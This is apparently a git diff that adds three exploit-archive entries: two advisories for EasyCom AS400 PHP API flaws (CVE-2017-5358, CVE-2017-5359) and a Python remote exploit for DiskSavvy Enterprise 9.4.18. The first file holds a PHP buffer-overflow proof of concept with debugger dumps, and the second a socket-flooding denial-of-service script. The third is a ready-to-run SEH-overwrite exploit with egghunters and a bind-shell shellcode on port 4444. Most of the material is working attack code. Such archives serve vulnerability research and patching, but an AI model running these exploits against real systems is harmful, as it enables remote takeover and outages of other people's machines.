+++ b/platforms/windows/dos/41425.txt
@@ -0,0 +1,167 @@
+[+] Credits: John Page AKA Hyp3rlinX
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/EASYCOM-PHP-API-BUFFER-OVERFLOW.txt
+[+] ISR: ApparitionSec             
+
+
+Vendor:
+================
+easycom-aura.com
+
+
+
+Product:
+===========================
+EASYCOM AS400 (iBMI) PHP API 
+EasycomPHP_4.0029.iC8im2.exe
+
+EASYCOM is the middleware which provides native access to IBMi data and programs. With its excellent performance and strict compliance
+with IBMi security regulations, this technology facilitates development of Internet, mobile and client/server applications in
+Windows, Linux, and IBMi.
+
+
+EasyCom tested here requires older version of PHP.
+
+Setup test environment:
+
+Windows 7
+XAMPP 1.7.3
+PHP 5.3.1 (cli) (built: Nov 20 2009 17:26:32)
+Copyright (c) 1997-2009 The PHP Group
+Zend Engine v2.3.0
+
+PHP compiled module API=20090626 (need to use for EasyCom IBM DLL)
+
+
+Vulnerability Type:
+=========================
+API Stack Buffer Overflow
+
+
+
+CVE Reference:
+==============
+CVE-2017-5358
+
+
+
+Security Issue:
+================
+EasyCom PHP API suffers from multiple Buffer Overflow entry points, which can result in arbitrary code execution on affected system.
+Below I provide some proof of concept details for a few of them.
+
+
+EAX 00000000
+ECX 41414141
+EDX 771D6ACD ntdll.771D6ACD
+EBX 00000000
+ESP 00C0F238
+EBP 00C0F258
+ESI 00000000
+EDI 00000000
+EIP 41414141
+
+C 0  ES 002B 32bit 0(FFFFFFFF)
+P 1  CS 0023 32bit 0(FFFFFFFF)
+A 0  SS 002B 32bit 0(FFFFFFFF)
+Z 1  DS 002B 32bit 0(FFFFFFFF)
+S 0  FS 0053 32bit 7EFDD000(FFF)
+T 0  GS 002B 32bit 0(FFFFFFFF)
+D 0
+O 0  LastErr ERROR_SUCCESS (00000000)
+EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
+
+
+SEH chain of main thread
+Address    SE handler
+00C0F354   kernel32.7600410E
+00C0FF78   42424242
+52525252   *** CORRUPT ENTRY ***
+
+WinDbg dump...
+
+(720.a70): Access violation - code c0000005 (first/second chance not available)
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll - 
+eax=00000000 ebx=00000000 ecx=41414141 edx=77316acd esi=00000000 edi=00000000
+eip=41414141 esp=004111e8 ebp=00411208 iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+41414141 ??              ???
+0:000> !load winext/msec
+0:000> !exploitable
+
+!exploitable 1.6.0.0
+Exploitability Classification: EXPLOITABLE
+Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000041414141
+called from ntdll!RtlDosSearchPath_Ustr+0x0000000000000ada (Hash=0x05cdf8a7.0xce7d7411)
+
+User mode DEP access violations are exploitable.
+
+
+PHP Crash:
+=============
+
+Problem signature:
+  Problem Event Name:	BEX
+  Application Name:	php.exe
+  Application Version:	5.3.1.0
+  Application Timestamp:	4b06c430
+  Fault Module Name:	StackHash_e98d
+  Fault Module Version:	0.0.0.0
+  Fault Module Timestamp:	00000000
+  Exception Offset:	41414141
+  Exception Code:	c0000005
+  Exception Data:	00000008
+  OS Version:	6.1.7601.2.1.0.256.48
+
+
+
+Exploit/POC:
+===============
+php_Easycom5_3_0.dll 0day vuln POC minus the exploit, I'm bored goin to the park.
+
+<?php
+
+/* Basic connection to an AS400 iBMI System  */
+
+$payload=str_repeat("A", 4000);                                          #BOOM!
+$payload=str_repeat("A",1868)."RRRRBBBB".str_repeat("\x90",100);         #SEH
+
+$conn = i5_connect($payload, "QPGMR", "PASSW") or die(i5_errormsg());    #VULN 
+$conn = i5_pconnect($payload, 'QSECOFR', 'password', array() );          #VULN 
+$conn = i5_private_connect($payload, $user, $password, array());         #VULN 
+
+echo 'EasyCom PHP API 0day ' . $conn;
+
+?>
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+==========
+High
+
+
+
+Disclosure Timeline:
+======================================
+Vendor Notification: December 22, 2016
+Vendor acknowledgement: December 23, 2016
+Vendor Release Fix/Version February 20, 2017
+February 22, 2017 : Public Disclosure
+
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. 
\ No newline at end of file
diff --git a/platforms/windows/dos/41426.txt b/platforms/windows/dos/41426.txt
new file mode 100755
index 000000000..4fb945f7c
--- /dev/null
+++ b/platforms/windows/dos/41426.txt
@@ -0,0 +1,99 @@
+[+] Credits: John Page AKA Hyp3rlinX	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/EASYCOM-SQL-IPLUG-DENIAL-OF-SERVICE.txt
+[+] ISR: ApparitionSec
+
+
+Vendor:
+================
+easycom-aura.com
+
+
+
+Product:
+===========
+SQL iPlug
+EasycomPHP_4.0029.iC8im2.exe
+
+SQL iPlug provides System i applications real-time access to heterogeneous and external databases
+(Oracle, SQL Server, MySQL, MS Access, Sybase, Progress) in a completely transparent manner and without requiring replication.
+
+
+
+Vulnerability Type:
+===================
+Denial Of Service
+
+
+
+CVE Reference:
+==============
+CVE-2017-5359
+
+
+
+Security Issue:
+================
+SQL iPlug listens on port 7078 by default, it suffers from denial of service when sending overly long string via
+HTTP requests fed to the "D$EVAL" parameter.
+
+
+
+Exploit/POC:
+============
+
+import socket
+
+print 'EasyCom SQL-IPLUG DOS 0day!'
+print 'hyp3rlinx'
+
+IP = raw_input("[IP]> ")
+PORT = 7078 
+payload="A"*43000
+ 
+arr=[]
+c=0
+while 1:
+    try:
+        arr.append(socket.create_connection((IP,PORT)))
+        arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n")
+        c+=1
+        print "doit!"
+    except socket.error:
+        print "[*] 5th ave 12:00"
+        raw_input()
+        break
+
+
+
+
+Disclosure Timeline:
+======================================
+Vendor Notification: December 22, 2016
+Vendor acknowledgement: December 23, 2016
+Vendor Release Fix/Version February 20, 2017
+February 22, 2017 : Public Disclosure
+
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+===========
+Medium
+
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. 
\ No newline at end of file
diff --git a/platforms/windows/remote/41436.py b/platforms/windows/remote/41436.py
new file mode 100755
index 000000000..8c440a3fa
--- /dev/null
+++ b/platforms/windows/remote/41436.py
@@ -0,0 +1,98 @@
+# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters 
+# Date: 2017-02-22
+# Exploit Author: Peter Baris
+# Vendor Homepage: www.saptech-erp.com.au
+# Software Link: http://www.disksavvy.com/downloads.html
+# Version: 9.4.18
+# Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64
+
+# WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems
+# Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit
+# Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version
+# If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php
+
+import socket
+import sys
+
+try:
+    host = sys.argv[1]
+    os = sys.argv[2]
+    port = 80
+except IndexError:
+    print "[+] Usage %s <host>  win7/win10" % sys.argv[0]
+    print "[i] Example: dsavvy.py localhost win10"
+    sys.exit()
+
+
+# 355 bytes bind shell, PORT 4444,  bad chars \x09\x0a\x0d\x20
+shell = ("\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
+"\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76"
+"\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27"
+"\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5"
+"\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e"
+"\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03"
+"\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a"
+"\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54"
+"\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2"
+"\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54"
+"\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37"
+"\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17"
+"\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f"
+"\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73"
+"\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc"
+"\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a"
+"\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b"
+"\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e"
+"\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91"
+"\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd"
+"\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e"
+"\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec"
+"\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa"
+"\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4")
+
+crash = "\x41" * 2487
+retn = "\x38\x2e\x14\x10" # 0x10142e38 pop edi pop esi ret
+filler = "\x44" * (2505-334-300-100)
+nseh = "\xeb\x08\x90\x90"
+stack_fill="\x41"*100
+nops="\x90"*8
+egg = "t00wt00w"
+
+if os == "win7":
+  wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
+"\x33\xd2" 
+"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
+"\x2e\x5a\x3c\x05\x74\xef\xb8" 
+"\x74\x30\x30\x77"
+"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
+"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")
+
+elif os == "win10":
+  wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31"
+"\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8"
+"\x74\x30\x30\x77"
+"\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7"
+"\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1")
+
+else:
+  print "[!] This windows version is not supported yet"
+  exit(0)
+
+exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops  + shell + filler
+
+buffer = "GET /"+exploit+" HTTP/1.1\r\n"
+buffer+= "Host: "+host+"\r\n"
+buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
+buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+buffer+="Accept-Language: en-US,en;q=0.5\r\n"
+buffer+="Accept-Encoding: gzip, deflate\r\n"
+buffer+="Referer: http://"+host+"/login\r\n"
+buffer+="Connection: keep-alive\r\n"
+buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
+buffer+="Content-Length: 5900\r\n\r\n"
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect((host,port))
+s.send(buffer)
+s.close()
+